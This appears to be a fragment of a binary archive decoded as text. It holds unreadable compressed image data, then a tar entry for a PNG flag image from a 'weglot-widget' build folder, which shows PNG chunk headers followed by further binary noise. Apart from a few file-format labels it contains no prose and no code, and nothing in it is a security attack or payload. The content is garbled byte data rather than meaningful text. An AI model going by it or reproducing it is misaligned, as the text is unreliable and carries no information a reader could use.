�n�y7;S��MЙB�n�t~�O?�V�
t����F��>� Q��Qg�'|��^�3�L�;���47�A�fͪpIt����
i9D��Iv޼�����[%:S�A��
���n��,��n ��$�oGmُ��
�r�L�ee�;���0oZ�m�7�I��A}g������E�0j�a��C~w��5+L�X7�n~��)��y�,xx�|=�����mH��n�#���
���y�晛Zy+�V��?*[���7`:SUt���놄�Ԥ��aG����*;��.N\d�S�{��M�n�2W7���3�c��Cp�8b�o�����~r�
ߗ-�?�Q�����6
7���Σ9�����a:����3�[C�H7|?9Y|O�nx�几���T����}�R�������Ѩ�g����ö"�m��a;S(�K]C��ilq�ؾ5W�~���ˉox[��K��.�]v
<�n���pC9 \vC!<:ANd�t�8LNN�y�$�6��)�P_�)�:\4�g��
'W����O�:��LaW�
�]�?tI��ɺ�An�vg
j>$��ٰ���9���B8{��+V�<��� ���)��n�������
�~|!�LJ�Vd�-�膖�Ȗ�6=ݰ���z�L��)s;&*wLC7�'�o�;wb�@7j]Y-8=�4����-�A�1�R��1O�_7�<M��dO7(ulD5�����n�=�nK��
_}�խ��CC��FpG/���g�s��
�|;��V��d�D�wt�U9DY�r�7��BpC�^�n��Hͤ� ���,�d7�����nH�Y�%"b;S���T0N7@����.^��n�:06���9,ݐ�"��Qr��&��g��W�hv��>��E�>���T���*��U/�8���3:Gv�܀�
3K�1Ρ�dfpu1:�hag���m[�…[��M/�w�LG��vX��
'p[w9ۀt�=�%�Q�kf�B�3=$��̗�=ܿp�%���N1��6�/Y"���]����+���eB���FF��d��Q��W\��A#�E���#w��i�?����-o;��6��X�H7�����r�!�r��}�x��t�G�B��l�~�-��9m�%�� �
���u��JHYݰlY���(!KTv��0�_�tC�� ��{����f��Gy�7}���XÂ|2����]�Ng��uU�pJSBĸeK��%��׮�\��
����2V7���9~�}�E^7��
� �
ڶ��em�n�<�S���!y��L~e7x�D�p�'ޑ�i���fC�����bui�N�ӑh�ݐ�d7d��P�;�.�
���?��g���~(�
��*����m��7p�#�O7��
�5�8�)|�~���
˯t��mL��?��qʒv��?�������f3��י��[d7�LO|)%z[TJ����솓:�0�n� [�e�=~�^uii����&���>��m���EqShS^w�u�t�E��jd�/rtC���:��m�H�A�@Jz�@7�'��n�yÿ�_��)h� ��6��e�~t���S�d̝���n�>�B�g��V_����S7���L��M'ʛNl@�*�e����arpV7Ĭ�T_7�;ә�V?<\d��W7D%B�J�
II�n��
�Є��?�O�
uCDB?z{�sp�
���/E�-��_t�Tp�@7�,��W�03�d�X7��_e�����R��ei�o�Z��hK�)�
5hQ��F�5
�Az|���1�Nn��O7h�P���q���#�#C�?@I�k&-�X�n
�Oy��
u�3��$+r�B��}�`c!q���Pnhѭ�������"JtÏ����}#�
��פ�$�R`uCN/���0a�;T|CBf��s[,n�ߺ����V�r��PY�Դ���¹e�U�����Fk����c=��0g'��@��իQc��v<��n`�n��Nn���(�Z7hH="'vsIɇ%f�V�z�VB7$��z�ޝ��
TpC�ɝ'n���?$�_���
�7�q_7�T���B�B�
�|j*{�Ͳ��~��
n�a�.�[u��70�
��q�^��Lg
6�᫿�}���4�3EZ�M󸰺���T���G7<�ɹ�����qp�H7d��'SF7�4N7��
��@tj{����&G74���}=~�	xx�[��d��x;;G+���Ǐ+e7%!�P�Ws�����%ݐ�
D���	�E9k�]��'(��
Shi~ET�Ax�{pB]����
�Gk8��_&�A�nP��_sT޶	\�m�u�7puC�UO�z�E� �Ŋ�ʕ�����juCX���϶5�au��	tsn��@�BM�nShpu�]zg�\,�}�c��|�����1�1��~��
Jˏ ���A�gvu*��菾)�<Cii��6C��L�96
g �ph{| �
�V�G�^=[�
l�\y���Ņf7@�B׼��}� �a߆�,�{o��#���j���dd�I�Td7|d��O��ā�1�!J�سw#
�!�	����F�g�F�������
��7���7X�7�t�wCF��֍әx�ۦv`;S<�F
��	�^�x�t��WM�")��La8����-�Q�"�0:��__��++��<��W^Y��
?��3�^醅��"g��[^�%N��醳�����H��~�T8�H�O�㊷mJ��
�3vޓ1_2�!>��]��"��i���
�p��$�S�u��1�|���D���,��s.x��_�'��O�W_7�k5��@48���e7,�G��[�n8b���d�7кa�l����(z�7�.�~�z��Ce���x8~ߨ't�_cu���u�A�
E63Z��o{�
ƌR��SC��q�&�r��d��
g���3ݐ�
9�Ey�pǘ��n���C�Ŭ $t��ĝ)._ߓH���Q�iZ�~�6��
"ې �
`uC�Y�KA	�\x�UU��n��~Է(����* ݰ�������Р���-����
X�[B�7ĚKbg��\���I#V���^6�w���'��u���"����n���&�a6炎��l�J�l�z�|3�L�"R#6pg/�g��S��zZom�P7�7������7Qj���^��9�M���	�֡�^!�3��	h��q1+jj]��x�|�+p� �
�MU�U@U�f�0�92p��r$@���*�t����n�����,I��~D��F 2�'��l�Q�R��*�*���W))��\��Tf�����*�{6{������}��a�@�+7VK��p���:�
�����dt��
B݀�\ǎ������
.5�6�|��C��O7��k���
$I��OB�����_5������۽��ۅ�j��X�2�)��!�
o`��tpC�_�ʸ�
.�a@*���a���ă��u���WΟ��W]����?Za}Tp�]�JfeI	{[ɻ��u�,nY'�
������Kq���ƗflL���
kO�u:�ɵ�RK���hlPbH���u����i��?�mj��ڛ��/J����ܷۻ�}��b��F���ܺ��ڸ(����h��I�n���n�+[*�u^�M��g�p:S�h�@5��Ō�f�0'��Y
f{/����'v3]�m�E��%�OV7���Dq��5��X|
t�ng��Qj�|�	���M�n�/�!jQT}=\��ݐ��ؙ"����Z#�tC	L3�����n`;Q@W
�
���R}!��L�������W��:�q��$� �
������
�����nhA�fW&�a�l�o�f�����\/�Q��醾�{��M�C7�`�:�C�Dݠ+=���w�L#��
(.:� 	i�p.�cG
)rs�O<aoo��g�n��ۻ����;�c�3���b5i�$��M�S�:��Iz�huQQt�I�����
,��DXB:0a]`	�p�%�f�� ��T�ѵ���xR����>���y�sg.����˝���3��y>��F�s��`�tt��	��5})B�'Ǫ߅����}�r�S<<{J����ޠD7�t�o�(�����Ԇmw���3���ġ܎��n������-8φ�����뚃�c���Cl��Jv�X�M��/�xu�R�-�p����f�n0�L�r'a����I��;�ï��o��������q���
:���C��AGM7ġ�0���9�Y�?�
��K��J�=K�
��K��)��=q�܉	x|�H5^�
R�*�
�b�+/�"���n��!�We_vmDz�e���So"ذZG���W0��@
n��7�6D�c�
��E9��#�>��pr�	�����PH��%�'�����K�7,Y�)t���F���Y��H�$���}�������F3ݐ�|fU5�6T�Vk��(gט_��i8��Df_�^�O7���xu�2�b7�fťF�4����X�
Fހ�W��/Oo�u��
�n@�
�h[���:�0276y|ܺ!�(�n8B�
�����|��[7P>��x�q���݉t�Awr��$�n�������+s�bb��
��ƹQTW}���G�W���o<G#o?�F
r|v¬�������jk�
�
���&J��5���)Ng��Fݰ=5=�R�ҡ5�o��uUU��U4ݰ�d/���l��G��C7��\�cp�n83Ll��ʂ3����g�}hn�'Йb6\"�+��0h������S8��v��v�e�0��M4�T�pz<=zN>�h�7�����G��D������r��^�nz��?~�ǿ~*H�މJ D7��)�]��>��g3�ՙ������Y��I��n`g7 ��ět�A�ݠ�}v�"��0,�醊
��*�
�;�o4�D����(�q�A7�b��4��qo��}齧���}�ey��**�P{@�
���
i��99IK����[.�����0 �m��[��tñ7��؛��N�9
D�䭮>~���+~�T����*5�f����s�F���
_���5�ߠ�����(�%8���G7���@�[��A=�D���1X���56�Rz���
dݰ?$7�ޏV�^hNq�6u�̺�̸�Ԙ¢n���xt�I�M���"JpQ7����E������~��췲�J�
�iyܺ�}*��t�&zZ��4�o�m���~4�D7L�M�����;Ųn(�&��nX���[��7�{z�Y|�ễ�g��ww�����6p]�)<wg��f��볿�=����CJ�
	bd7x�
<p�����aǬʊ�[�Cu����@*�n�vz[-po�np���!�
�/^H�
�ޠ�s��gfɣ�ʠ}r��nx�Q�_�<A7�=����=�t��`�
\����·_���W���D;u���Y�+�oڧ��7��i�sy����z�ҙB�� 7�
�o��y"n�sӂd���7H�xe����
hKq�~|��h?�ͫ�}�M�6���
rzC�רR�� �o�%@���@�
���Πo�����T��0>�J7�km��,��	�Y�t�G���L�0��ĝkG}D�
R�vt��+wv����L��n�Rt_�Џ"HtPtC��F7��aUW�sgu�
gvC
�mW��Pr���.��G�d�n0n3t����f�!�3��LѽY�
�/�ujvCs|3�#	T����y���3��t�����-7�mQn�*��W���86���ȯ��wd[�
���n����t����J�nľ��М͑��\�����(:o_��ޯ�a`�Rݐ��n��Y�P7D�E�a膮�npd��k7�ÉPh��JC�Ĺ�h)����s���g7�f�8u����c���q'�v���v%��^*B���,�I��0k�M����,��7��n�_.8�n���Yr4�n�Cr�$���Oz]QѼ�%�n�$�itÔ��M��S2�#���0N�
f�
�$�%uC������P�u�s���C�!^�!اr�W�'��݇�R�oQp�N�@�Rܠ�
9�Bc����uC��~��nسgVGM�5�i�dǰ�dRyv�N7\�E�5<�A�
��E7,S���r~F
̍fd?TBt�����ֳϋ�O{tC�K�vl�[7�����^1�]Ă����L7����w��a����)i�A�#��B�%�.��bI7��"���34�Νl� �*P
�͛u����nV��ʧ5/�̎/��?/1���
�醞bªO�
u��7ht�˵��dw�+�;�е�� �A7����ܝ)�7���� �ni�A���R�ܺAnh��m�
A��L7�DUV�FE�V�}),w�h1v�@	�G����٪X0pSt1�������(�����O.b��;�0M?`d�x�K�	X�2ꆩ�n���!��
(���f7h�|q���Lr١����j��n=�R�H7�s��3Z��(��ww�/֬J�#�n��O݀FA���:�{ʛ���|M7�!��u�ؚB}O�)�t���bꆠ�🄇�tû1@G	a�t�SjW��|ĺ!It�[S̟o�nh�<�L7$/w�u�Ӿ�'���i���e7`�A�j|�p�D}pp=�(�醍q�7��H7;ScK�n�����O��=L7��˯�s�e׻teU7����������i���/�9��1:z�S>��v�T6��P�^�%%^��:>�
�9as�2�U���m@/s�!���{Ҥ�h-�r|���/̲��Q�����
f禐߿�
��}��,��v�`�c؁/�A���іߠ�
��o���l�L$"� ԉ�8L7�C�{��O�nؖ�Zk�m�`(��ˣF,a���
-�@49$�����M�a�~�}�vt��v�RS��X�
���Fwh(Q7��>��]h��ox�H,�W?:ں.��~A7�4
�)zC��� 4����v�����nP��F��)
�+�y��m�
�gO���K�f7d���yn0�y�~A7�e�w���x�]7���
�h�ͺar�d�\�'۫~I����+�%ܤ~u١b���q�\�8s���~fI���u��� �,�A,5�A���΄���#v`7Ⱥ������醗^�Pmi�ޕ-���Ւ����W��u�����)�W�Z���A����t���L7�u�0�6xd�
�v�J��>�!q�ڵk�!,V��5�H��n�bK�g��n`���>�AhJ�݇��Q.JV������"f9��%�2Gd	���Fo�%ep:��� ^xtlo���A,��a�kU�*��К"���"놠���5��:�z�R��S�z��
�����XJEr=Z�'W��8��h�
F�@H^V���
�nq���@1���Nݰt߅��(�pA�h��ХK�F�np4�
j{WStY����%1��Ε�#�p���o�Y7���(���Ԫ���^zx�,!!�T-C�ͬ��R[��n�M���c�d�Ə�u;>R|�]��Q���3�yEE�����2��a�"8�3�96X�
��0�nXm��v$7H����P�u�&f���YHN>��hw�G�f�_b3���Cp�N7�_��/��
��=��e�Q7��r�V�����u� � g7 ��nX(g7H��u��I�ᦈ2��k���}?m�
�@^��Jp��3��8t=����	����{{��G����q��1n�V��aٳUU������2R
Т�x5֙bѓ~���Ñ��
v���ReI%̼{z,�=o��W^�^_P?��n��hrC�� 놰K�,膠�'��K݄�oܿ5��[��#�n� [^�
���\7�,�*�r�4jAL���
�`��թȫ�	(��1����5
�Mۊ�ܺ�u���
���!JGۨ�uSץnݷ���cA7Pq�]����(���>���L����#�9�>!�!=L�9�oQ�,�
��DŽ!�
��Q7�NM�M�
&��ފ�Zt�{c�-*��)t�a9A7H��4{g�h��D����np
�hk�����A�V��99�m�
���8���v�f7H�AzM�
x+
)�A��O���hNq��������莨��tC���P�(\7��\�rh[���`3J	n�"��u�uG����~S%��?���Ch���U�0��ro��ݐ��@�w@`ɣ��lͧ+S�o�[7��N�P��t�������[�n��F�n��:E7�q�e��.�����m8�)�g���{�Z�
p
S�Si��=Z٣�~K��f����#u]���ԍ"Q�� o_ȶ�[7|���<�a�X􍵬7t�B�N7̗�Bi��膤Ѕ�WL7i�5��*�����+quC�g�k'O������kE7��n����#-���[�?��
����1Ж]P1ƨ��Ip��Ȩ�5"t7i�ݺ���J��K���̲'�A�
w1V�K̫����Mp�.��ǿ�ZQ���
Rg�]���ѯ4����I^ju����%�~3�o�0N����k��s�p���#G7<�u�	��$ݐ121P\,g� �̠f7`W��}��� 6|�=�_?�n{�Q�PS
�%�܏]6J7I3x#�Ja�{Υ�Sn�nHP��P��OJ:jZZ�J��
��;Wj�
H7L���iߟ:�T7 �o�4�W؇9W��t�k�xt��*ڭ�FpA7�K�!��`�Sq��
��ݰ�[7,]�V��0W,��
A

#.�A�?[[�����B��{�9�΁�H74\N�ރ����[7пVt���,bi�|,ꆂݻ��ǞH�n����۶�����Ϥn��ၧ�n��)U7d�w�J�$�C�AX˺!�;���f��k�%%7��
ݡå��콰w��������&խ_��fn������|�t� ����M��
X=�e���W,������n��ɼ�<R|8D7 �О/0u��}?m�
�~�Zp�-���@�
A�a���-6��%�lXP�Ân���*;tC�� ��fY7�1��,�u���P�Fp�p|a6;j>��֣u��7�t���/�n����_X�
��Wӕ��coL�uC���Yv�)�!H�
j|�F7��rg_g
�Ҭ���ף�u�`�'���X7�<c@4��T�Tԑ��K��_7|<s��ꆎ��l(�ﯘ��a����	��R�g��o�^i�n�%�1�a�A7~;��e]��X2p�����Z_^��z�ܥ�u�$�;0it�������ʒ��
�D��G�n�t�IvއB�
ytC��
�6膍qq��G�Y�
�X�c>��-Mu�GWؠF��q�W�ՖtC���-��*2I�M>�u����ʜȫ9<G/ڭ�i	���_�d=�|'��e7�
�ϕ�`�nȶ�`4�==�6�}H�z嘽�?d�tQt���9R�
8���_��8����A�M̰��E� ������0.D���
T�`�R��]�O��
��7H�AjR!n_h��S7��e��z�����g�+R
�h�r膹�ho+�p
Uu�6X�
�̒k��?�E�
(��^{t�+��•��
m�
���p�����3��L���.���U7�M�ݺ��h2mx<t7�� �lb�A���
��Rx�>�4�
�?�!�AG�
��N/t�JH /u��;H�
��L� :��q�_����axn�.�[7�S��t�ACi^@�a��n��.$<� k7O&��o��@|�CX��	���n��f7@S
ԒB�G��Y@��audNii�����a;�n'.�yGC�p�SKCC������Jv��
R���0u��xuC�܈r�tCkv�l|�>���5���`�7�)zvC;:�M؎���m��nX��9�G7�O����˺n�+��;J�n(��s��e�ݠ�~�b���&X�
��?n�1����uC��T0�_��^���M�<!��B_
�n't�xO(�
�nur�w������d��u�@u�`�իW����&��%5�ܠ�
w����u���T��+P
��u�
rv�x�nXh�n��ƛ�P2`�]�	��a�
��[t#���|�=�=�|�A�:��i��O���*[t��f�n� ��'�
I����� 醗�W>��H�zm����ݐ�|iw��a�ĉ�!>�0�r3�
Jp����n0����`����f��N�_dv|>��a�/՗���'=}0��>xTūN�Zݐp�Sj���	E�4����
۵cfد0g�"p0�;�Gg
,�a�t�����u�X7\�u%��npf�ݙ�a�
�+��a�����a�nxj�8�'7�A�o@���\���~��ϧF7��-)��esݐᢗ�!�{��M*,��
UƵn��5ݠ��)f7�
2m�,8���n07��
v��)�A�+�K����e�� Nݰ��ݰ�3�AoX�gv�����a?�����1:�@�]b7��@n�I7�
(���Bs�ijv�6p醄V��y�����������ޠ�b>���/ңD�@�
Vuq��O��;�!<|eKax��RVY�
��,nݐ2�I�7Iy2�A�g�S7.�цd7أb���X,�!�����'6��d7���?�܀�7��� u�8�M �!.<�Љ����C��T��4�AO���Йb5��9>�oSv�@7,F�am���	�
)���uޔ�n���
X�C�|��z$�!���n�����(<�e7�.�I(���At��Hq
�R�(e%�ZSD-��3���Xe)�����~�40�v��N_YNYYnI7�����n���׷����
ۘ�)�u������"����3��0�u/�O^G�KݰC�|,���q�:��m:S$�OrZ�
���/�Q7L7f7Ѓt�!����:)�����
OS���0-���s�u)�Aי�TVu�R���Ԁt�&�A�
X|ک��L�h��
-)��
�s�u!��M��A70�ȺaIs�m��܆���b�է��a��U6�c!ݰ�}������
rv�7<��-o�G7���"��0��-��nHv�ܠ�
R|��n4�!�2�
 7��>��u�퓩n8=shuCK��,�`�-M)�(�Z�n�Ό'�X{G��)�D7�12� Vg�!�
��|yy���
����/\��v��9�
Xp�F7��
(n��=?����Q�MJp0�n�6�����F{##�7X�LQEC����܀���
��<�ad膍�q��&�Q�G�ݰ>���h��g���'��I�nn�����p�9�!�t�A7H�
���Ӥ��4zò
<���GS�T7�l�=�AnI!��g�W8t�wRr��B��um�;�
� ��
j=n�a�Gä֋�
.�D�
�~��i�����Gv�
�
��4�!V�`��
�o�u��&]��#V�n(�w�p8�
�n09�0���,s�p�-'�n@s,������a�vm�@Z
�G��3Q7�Z���Q����*�a�(cg
6L�� �.�}!,��
#�3��Pv�p���E��`�nP��T7l�A��@����nxz�t��
��W7�zT�!^�|��`ώۑ�@	n ���?�nX����I�a�6�A�h����#݀��綢���
��3�t�C�nء5
�qp8|�L7@|Cມ`9{��n`g7�!��ܠ�>$�����N�m8O�
C���F7�;>�nx,t�oj��An�9݀�7�$����ݻX����
���t-���B��i�4�+�2�
�D����E�,����uûI��_�珉n 7ؕ�`�n�y�=�!�9�َ���!+�)��<�A	n��1����
�+��n��n�9�������>l��n���Q�/����$
[�IEND�B`�weglot-widget/build/images/circular_flag.2a0fa173.png000064400000244137151330373270016337 0ustar00�PNG


IHDR-�0=�G��PLTEGpL�>6s���/�����_0���5���=7�0��+�f2�d�S@�?7����������L;���u*����N;2J��:I�������4��*H����1����+��D�_���)������B3J������D@�,5tƗite0�]�C:�A<�uy���fd��bQ;N�0���/>��+��-�f�0��&�`��I�9.�-<��,�fK( &##���5�r!""�M+�1)+(%MJ]����rk똘^����,I���)�ei�M�Zff�מ�b�nm|�������D��3)�h^���v-,�y�
0/("""բ'fW���M�����D����)���-<�L<��'�`�9+4��+H�!!!.�qG�QK�������F9u���!�:F�F8�*f�5l��|�l�-7���,h��<�}^������j$���<�0�n��N�#��aj�����ХY�d���A@r<==l��;������ݾ�14/#����֕�I�QU_ga��ŔЫ�ȈwM�������w�?��f������Lƹ3��덟ƌ��Je�u,��Y��֗��e�̝���xvv�x�b[��`�~mƓL�4q9ZU#=W��6Բ�w]A��}i�t(ڕ��[3ЦP�M@��>���~��Z&S���v��D�&��+�����ݰg0���`�OG�x�KYS �e����DhZ�d�:��-F7yntRNS/�6�:�Q9Q�d0�<�6��P6����d��/Q�3��R���T�É��[���d�����WŇ�6e���Y]�a��òƄ���Ľ��������ي��¡���Gۄ�D�IDATx��{wUE��m;$

1H�HH�DDi���
Qa�}����\!I0���ى�<�\v.�I:	�͍{.H �4i�1�Gxkݫ֪�Us_��)��S.j͚5k֬ߚ�G�Cy(�<���P�Cy(�<���P�Cy(�<���P�Cy(�<���PJ`e₧�p8�8�xz�ć�x(�<���P�Cy(嗓1S6.~�[E��<d�M���˶}��q:+>��GsC�鏭��IOH2���&N�T�Q��lY�6r��M���9sѢ�cG�6u����	��7a����ۏ�dŊ%K�	�_�iә��
_?h.�τ�A0��*x��Y��
�OHPPXXPP�h��Ѳ�^?t�xP{/��D���'>�d��@]�����!a�9���	�/h{�x����䯄�9&d�,��1RRgd������k� Y��


�5�1F�?kA�4o�<�����2e��)��7�~��9r�:�C�ܲnݺ���O��Y��5ccϡA�`�x|g���O贅B�	�?x}�Cd���	_���X�|�>qժV=;�_$>_����O��=h$�p~��[��_����u���)x>B��xl��fi?�@�׻���k�ɲ&P�̴i3� ��wX�2e���/�"?��m�$�4^(�#�/��.�υ�}w��i���@���+����wP���/t=����H���o��Y�|�l�`��m�~t�wI�����A�-��'4��z7f��%o��D8��.��	ؿ)����U��^�ڇ�^�%�p��/ ޟ:�ޏ<��8���/4�����"��d������_�(��g̚��7�yߚ�?�{�O�9sld������@�·@�7���|�t^��l��Uⱀ�U��O_0�I����~�F�c%�@�狠�P?AS��mjИ
��{�ח�y,>�y%4>�5~| ��.�H���g�&?۟J���Ň��'���π�T�:���?@>|�`�X�!o�{ɼ7D�"�z�>/�b�ˇ@�G��(Ae�>�Ͽ�yk�♐��ߒ��;h!�?��9�w�C�Kz|��'-x�nћ�Lo��4<�kIFm����i�����E��ڇ�4Q�G�ٵG�z�.�V۶���d]^X1ˮ����� ����hE?��~F۵�?�O�.���˶?���$%U���b�N]��go/'�"��H|K;iA���'��d���ɛ�����v�罸a�=��a����~T��?��j�.Oُ/��c�x�>B��:^&���艜$]o�b����^d~��Nd~���eߟt�g��k�o���;S�P�,�?�>�/��;<4��.�/���A���qeQ���Ra�#]�P�M�H{��������ϼ/��"�>Fn�K�xf�KY�#_�_P�@�_�Q�,|�C6��x��?��,��ui��
�|���L��"ן��P�_�`�K���u�X�aׇƷP���l]�7��4��T�����]���SN��O|>�'�ū��'����7]Q����e���t��GP}N{w�]f�;���P�|YA���oO�a�.���~�����xA�!t����E�~�z�OA����`��̃g���~4��4����GD��G����g�O�\���B�nI2$�Hd��ǁ�a�(�녂�w�^B�}ӏ7��@Ɵ�z�C����N�a����Q��������Y��T�Pm�����zN�.B�q����}�������+����
���G۾�e�G~_/����/K0�D�䗎'��'����;�~��_E8/|���ߟB�kh��j���1c۵O_����/��/|qH���z�|���Q�䮈����^��>����cP�0h�xc�'E�����>B�3��Ÿߖ�X��ԏ����E.�|�i�؏o�R�|�Tl9B~����E�1��w(��>mܯ@	zh|���|��~'vN� �(���#��g�o����.�)o�3���l[m��U�<�+�LZe�^o�L��C�C�0�����
t�
]���$4��`����C�h^譏W��ʏ�[���w�>��>����3���3l/��ʟ:��߅,��"��HvМ�?7ܟ����U8�����U�;tT/�~�g.�Z�Qk9��	�^�'��e�x��	Dx+����SL��۞L))#^�M����m¯��9[ՋpK64ӟ�����*�=O�?�Ms�[%U��`��q�?��"�_��IҞ���Fo�7��[XvC�q��k�����9f��36^C����E�3��g�U4i��o��A��5a2�X���G�/�Tq�&�1"~aуC,����O&ٷ֟�d)̿��-=Y�ܶ����o�&)���{\��ޠ����Ri]�n[��\_����Nv�y�xA�Ä�`�����4R��Y���*ý�}�_�_3�E�����ڿa?b�yq�f7��g��q�������|y6_��JY��J<�&��;�?��;�R�Mh��>4��ϐ�9�&��k���4�W��Cl������*���O�(��|u��}._l�O/�œ6��|��P�_�N�*��������T������A�ݒ�ϓ���?\�O}.IJ?jh����k��*�Ů�_�x{�⾾��׳d�~�1���G:�h��%��W6���@�ky�����B�;��^_�p���y!
8a�2�:�m?����@��3����w���O[�
pK���G�h�g|�[��~
��}�Z���?�._����w�|7n�3����%���@�	�W���x�o��mE�u?�����c�k��??�g}.��j��Vn������}y��㫐�7����/O������?ӟV�g��F�<�O��,^�/���E��ڧ��~$��kb�CQ{P�m
ඟ_·@۫�p�c�o>�ܿt<���D���/����˂1~�?��#�>C_m1�o˫�\��O��p�8_dY�޷��4	�<(�v^>/��s�z
����f?h�m&�ڭ��o?&�o^���U1��n�(��.��u�}�s?�^�QP{��*��pO���/�<=����V�l~<l]/���J+!�$���<���u�=y�?�kk<�t�?�?�x^�g���;/ķ������ʏ��^�=؞��T�3�)W���=���Cx컀*�X�(0��<����-C6R��1��v�pg+U���lu�x�YV�6U:{U���.�ֲ��C�k��-3ᒇl*�Va_��d�,eV-~�_�$^c��
������3��y�4a#�c-�;�?c���7����4���\����_ҏ����wTaڛ5���8X�c��K���?Ԟ��5��[�/�9�3��}���'�&��C�������L��Q���)U���>�!�x�ߊoK�Z�/Կ�=�t�n���ݿ�p��w��^%���9���?�E��p�v}�浟���g�y����w��D�lFb��F����]49´��l�_�_��4ܼ���?n?B�2�&�7��p�/p�s�����
*�{�?2��;�}
t}�|��g����WZ�q���o�7o�_D�/�)Ͷ�V�\��ysÕF��a�C����4a��M��+�j��}.'�"�,l�:�o�$�
|��y��_o�� ��d���;�f�{Ϟ��ҧ5�����eoםP�o%�Bׇ�o#|��r!��^l?_���ƈُ��Ϣ��1^��ߖ�m?�L��w������_A�S�����?x��F��Z���n�|��[��g8����]��RR@�1�2�_�)�� �p$�ps���f�۟��6_���@�w�|'n�|�:��i�����G>�w�矡���+h{h�
�߹|[�'~;����~�~���|�OU����I��]2��>��"����_�77���||���H�ʊ_*��7�_�~��G':1������c��/:����E���+��T�z}<+b��·@�o�z!���^�$��K�cS�a*�ߚn���'9���D�ğ�|>�>߯��o�<�4�\�@���(��>W?_R���.���Gޜ�A�;������~��y��{�o�7��O;J�n^��.��(��֟�8�'�h�?
h��c:��n�=/�М�gs�Xplɞ��x�à����|4E��@�m�z
��B�!8~�Ɵ�v�h�����OVb�^�����_�	}�9�4(`���g`� ԝ�����E��'����wS��)�P^|�� �U�;[�d��t��N�QZ��F�d��3�}��(�C�!I�g�SR�E�C�Kd�s!��ӄ~}���C��G6���?�]Y���E�Oſ����ɐ�X�a�?�=
�f�ߺ�![�.�!�q��
p3�����8���?�2�k��P����������=3���,�\;CX�k?�i��?4)��������K�E�Y�7�O��d�?@�?�O��7�O*���?�0~{����P����s����X?@���'�f��WL����!��Qn�x�����J*
D���v)w�����=����B`�R��
p3�'�I���Ϛ�f����+o��ල_��"��
d�
W���t�\:ߡ����+��$@��7���/ŐE�A����V�;�>����7gn�2|Qt�����|�g������~�\�W�����a��U�ē`�_��N����_���
 ��2�_���[nTE�/�$������P�ô	2�ݑ_Y�+p}����vȇ}E׳,r���v�Ġ���+�m��I�x�9"��!��i�ˋ������ܘ&$�My����_�S��&������Oc}��z��>�7�?�$�͞�����@����I��(�sbH����?�2���
���3�~��(���?���nf��
�W�
:_����3��+���A�`{p�
>��`��;��<p������R�h���%??�G}�ן,~�۾bȶ����f�����
������s�_"ɾ~��������:B�ۨ
�_����:R�����'`�;z=k��h�/���^��NJ̯��C���Sn~|h���o��x,�G���sk��o<�pr��?�OX>j���Y��2�m�V��實]H勨��>�g��![��R�z
?/��w��#x��w�A3��\/��w��
p�k@�PnV��.��(���+��ɬ��T�����p��K�D�z�ϳ�,��!���=4^�0�V
�O��*�-���������Cp�;/�W~�_�	4/�����*�k�q���'��iX�`�p>�س�~�p�����9?_��|/l7�;�X �%�4z;�s��&��YV���m�~�ڣ-'rP���;�&$��S���Q69�)�)Ek��0�v�q�|�����#�)��;�U�����h��G�[�rDu��{��29D�Kh����nz�wr����Bӿ��M�o~QڿA>�N<\���k��K�wZ�zh�a���_���Lyj���{��9E?��X7��o�2�6^`�l/����џr�6�~�G��n���[h�:�P�&�pS����Y7�?zy�8��S?P{���%�������শ��c��������J��>ܶ����6R�)�����=�f$�n��/
��/�M�c����=GE�n���/�
ඹ_����7��ڶ#�~�[�N�.��I�������+��f�����7����o��]s�(7m|_�l�|-�qsO�X֑�C�����g�ii�r�����g�;IL�>1��xu��I��Oy'�p�%>��i"u����y�N�>
��3�w}NS�E�����n{K�\Ge��W�P�C��)}}���r���f�HY�˸�Le��p�g��e�ߎ�ݙ��)4�Y��{p�6�W�:�z���त���=I�I�{����W���Ч����I�e��V�[E�M�Z�_3�M��@���	^�π���&ĶB�>����7Ӟ�_��C�( �'��Ә�#�Y�x�p���n�䯠�%t)��F�!�O���!a}B��=4���wP�~���`�?��}�������+$�m?����>��O��Ͼb�ga���M�x5�@���d�,���Oօ�Я�S@�W��
�����E�|_��Y�u�{���aϯUN���l�h'��W@���\���W��!�[�.�Ƈ4����N:����cȟ�n����[��x�Y.��d���'0��ϙ�CU����W�p��;zK!�"�}���ϗa�_D���^��y��^��������7�@�s/�-
�f�׀�a��`�]"�Ѻ:v���,ђU�����m����a;ÜU�o��)��C�C�U0��o���LP�H�w���
]���Y�?�����#�R�w��H?����29��J�Q�*��.;`�;�n�|G��%��&Jֈ=�45�Q�����=+��/��D�3Q�����)_�w�|/l��ld5�~ş�|NF�3�
��߲??��?�2"���L�<���� �g6�_[v���{��))45�+SY�g���9颟����ݯ�$,e��\�L��ҟ�j�m��|4�dJ��er������gܴ��䊥�s�2��*�M�7�o�O��Ȳ"m�N��7�	i�=�ǫs����Ε����y�:���J��[��h{e�7e����+��G�����k�ĕ���/Կ�d��g��,7�?��K��n�~����?�U'�O�����~j঍�?̕]�<Iw���l������Z����b��X��v���
pS�j�f���Xi`����v���
p���
p�a�H���޶�v�2��i3�~�B�;�?C�4��oh(��6~�����*�9'�Bp[3"�9�y��;7�4
�'Δ?��/`�|�������gypG��6^��'���_c}�����l���O)�]����w����=�}��B-�SFM-���ݡ$�z/�ׇ���GZ��U�ʼn���e�$��Ϣύ8�}��u��1�Y���6�Yd}Y���o��[��{����_3��Wkk�^���8�z7�ܔ���]�
��b���~X�ǧq�2c������F�k9��rb��5>��?�o�g��_R�焚j2�N�c�ڧ6?��Ͳg�����/
D�	��\�y�O@o&��*�������Η�d6���C��i��tuv�ꯠ��6~�y������b��8����~�~A��@�c�
�/E��`��$W�^�OM�ܯ�2�u�B�i�=��#��_���>�O�K�KJ]�����wN-^�v�+�����s�Jp��?݂�� �Q(��"���k1�3LbYO_����g�+�׏5]�v~�%����oo��7C��-����$��i��N�M��q}�����VV��P�\�J;
��}�}Rn����E��|�>�g��K�0�/J��S/�˼�GrN��?x��ܴ�\`|���P?,����<�K`=��'��$6�p��3�{�^�=/�{����W����yu|+�g~�׿��+��5t?�����+?��m���,���C�x����B�`�cOuju�/}��N�ۃ�	��
�>�����9��<���%R�iω��g�=������x��E��'���w�����F��Dpgk��
��G礟������K&,τ�4�	�I��3�n3���/�6߱�xYF�F���/���[,�r�6WYZY����X��6	pkE�ǂ�/K�m�m�mcϖ�h�s�mn�d�N�m3-����-����?��y7��8�;�!�ۻ,��Ⱡ�<������`sD������]¬�������:�mio�����@۫�	p����O?E�6�KD�
